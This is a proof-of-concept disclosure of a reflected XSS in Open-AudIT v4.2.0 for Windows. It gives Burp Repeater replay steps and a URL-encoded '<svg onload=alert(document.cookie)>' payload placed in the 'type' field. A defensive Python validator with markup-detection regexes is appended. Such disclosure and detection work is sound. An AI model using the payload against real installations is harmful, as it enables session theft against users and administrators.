Reflected XSS

Product: Open-AudIT v4.2.0 for Windows

 

POC:

 

Open http://localhost/open-audit/index.php/logon

 

Log in using admin/password.

Open the user list:

http://localhost/open-audit/index.php/users

Edit any user and capture the request in the proxy.

Send the request to the Repeater tab in Burp.

Now log out.

Log in as a normal user.

Now go to the Repeater tab, where the request captured above is waiting.

Send the request again.

We get an error.



 

Now change the data parameter and add the XSS payload:

data=%7B%22data%22%3A%7B%22id%22%3A%226%22%2C%22type%22%3A%22userssagar<svg%20onload=alert(document.cookie)>%22%2C%22attributes%22%3A%7B%22lang%22%3A%22en%22%7D%7D%7D

After submitting the request, the XSS executes.
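A server-side check for this input, added here as an example and not part of Open-AudIT or the original post: it URL-decodes the data parameter, parses the JSON, flags any string value that carries markup, and additionally requires the resource type to be a plain identifier. The two sample bodies are constructed, one from the PoC above and one as a benign edit of the same user; the function and regex names are my own.

```python
import json
import re
from urllib.parse import parse_qs

# Markup that has no business in a JSON:API "type" or attribute value:
# a tag opener or an inline event-handler assignment.
MARKUP_RE = re.compile(r"<[a-zA-Z!/]|\bon[a-z]+\s*=", re.IGNORECASE)
# A resource "type" is a bare identifier such as "users".
TYPE_RE = re.compile(r"^[a-z_]+$")

def _walk(node, path, findings):
    """Recursively record the JSON paths of string values that look like markup."""
    if isinstance(node, dict):
        for key, val in node.items():
            _walk(val, f"{path}.{key}", findings)
    elif isinstance(node, list):
        for i, val in enumerate(node):
            _walk(val, f"{path}[{i}]", findings)
    elif isinstance(node, str) and MARKUP_RE.search(node):
        findings.append(path)

def inspect_data_param(body):
    """Return findings for the URL-encoded 'data' field of a form body.
    An empty list means the parameter is absent or looks clean."""
    raw = parse_qs(body, keep_blank_values=True).get("data", [None])[0]
    if raw is None:
        return []
    try:
        doc = json.loads(raw)
    except json.JSONDecodeError:
        return ["data: not valid JSON"]
    findings = []
    _walk(doc, "data", findings)
    # The type must be an identifier even when it carries no obvious markup.
    inner = doc.get("data") if isinstance(doc, dict) else None
    rtype = inner.get("type", "") if isinstance(inner, dict) else ""
    if (not isinstance(rtype, str) or not TYPE_RE.match(rtype)) \
            and "data.data.type" not in findings:
        findings.append("data.data.type: not an identifier")
    return findings

# Constructed sample bodies: "poc" is the payload from the PoC above,
# "benign" is an ordinary edit of the same user.
SAMPLES = {
    "poc": "data=%7B%22data%22%3A%7B%22id%22%3A%226%22%2C%22type%22%3A%22userssagar<svg%20onload=alert(document.cookie)>%22%2C%22attributes%22%3A%7B%22lang%22%3A%22en%22%7D%7D%7D",
    "benign": "data=%7B%22data%22%3A%7B%22id%22%3A%226%22%2C%22type%22%3A%22users%22%2C%22attributes%22%3A%7B%22lang%22%3A%22en%22%7D%7D%7D",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_data_param(body))  # poc -> ['data.data.type'], benign -> []
```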

 



Video POC

https://youtu.be/dejNbStg4aY
